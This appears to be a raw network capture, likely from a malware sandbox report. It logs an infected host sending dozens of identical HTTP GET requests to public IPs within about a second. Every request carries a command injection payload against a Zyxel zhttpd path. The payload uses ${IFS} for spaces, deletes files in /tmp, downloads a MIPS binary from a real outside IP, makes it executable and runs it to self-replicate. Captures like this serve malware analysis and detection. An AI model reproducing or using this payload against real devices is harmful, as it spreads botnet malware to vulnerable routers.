                                            Jan 14, 2024 15:50:37.383244038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3828192.168.2.234345443.138.143.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383269072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3829192.168.2.2337482136.227.93.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383290052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3830192.168.2.233812662.168.18.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383322001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3831192.168.2.2360292119.168.150.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383341074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3832192.168.2.234964293.146.217.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383366108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3833192.168.2.2348670101.5.161.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383416891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3834192.168.2.2354696147.209.225.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383438110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3835192.168.2.233886048.178.225.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383479118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3836192.168.2.2348948122.156.196.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383491993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3837192.168.2.2354828153.171.143.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383513927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3838192.168.2.233479431.170.10.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383553982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3839192.168.2.2354736120.240.236.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383575916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3840192.168.2.2358490104.74.66.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383600950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3841192.168.2.2353386205.141.191.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383626938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3842192.168.2.233983471.210.102.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383639097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3843192.168.2.2355860216.168.30.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383668900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3844192.168.2.234571437.107.158.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383717060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3845192.168.2.2342362182.204.181.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383749008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3846192.168.2.2360716111.101.179.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383771896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3847192.168.2.2353808207.231.171.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383810997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3848192.168.2.2342952138.222.199.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383842945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3849192.168.2.2342512148.91.3.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383878946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3850192.168.2.235786494.138.65.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383908987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3851192.168.2.236092057.39.187.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383928061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3852192.168.2.234075464.24.247.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383959055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3853192.168.2.2355736164.236.116.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383985996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3854192.168.2.2354272139.38.152.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384038925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3855192.168.2.23598341.166.10.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384064913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3856192.168.2.2343534156.32.115.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384064913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3857192.168.2.233700448.101.173.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384114981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3858192.168.2.234227425.54.177.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384126902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3859192.168.2.234237057.170.73.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384150982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3860192.168.2.234014873.183.154.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384172916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3861192.168.2.2357424204.146.214.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384231091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3862192.168.2.235037296.250.24.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384258986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3863192.168.2.2341918123.234.197.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384287119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3864192.168.2.2358896119.194.148.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384310007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3865192.168.2.2341524162.186.236.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384334087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3866192.168.2.2349618165.48.56.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384366035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3867192.168.2.234348658.37.235.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384387016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3868192.168.2.2358200142.61.168.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384411097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3869192.168.2.233406695.159.160.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384434938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3870192.168.2.2344730122.255.232.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384483099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3871192.168.2.2343430161.26.17.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384500027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3872192.168.2.234023286.114.179.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384526014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3873192.168.2.233744814.143.37.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384563923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3874192.168.2.2356822198.216.234.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384591103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3875192.168.2.234490241.87.236.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384618998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3876192.168.2.235453270.9.227.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384653091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3877192.168.2.2341374191.249.87.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384674072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3878192.168.2.233673452.37.15.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384730101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3879192.168.2.2345274157.12.181.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384768963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3880192.168.2.2357056199.11.33.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.384795904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3881192.168.2.234080271.2.24.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.391901970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3882192.168.2.2358194148.66.73.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.391920090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3883192.168.2.233865641.192.228.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.391942024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3884192.168.2.2336734193.154.242.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.391988039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3885192.168.2.2343014166.228.44.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392018080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3886192.168.2.235660086.218.234.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392040968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3887192.168.2.2356544147.55.199.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392046928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3888192.168.2.2335934138.202.139.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392064095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3889192.168.2.236043254.181.70.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392071009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3890192.168.2.234333053.130.38.91443
                                            TimestampBytes transferredDirectionData
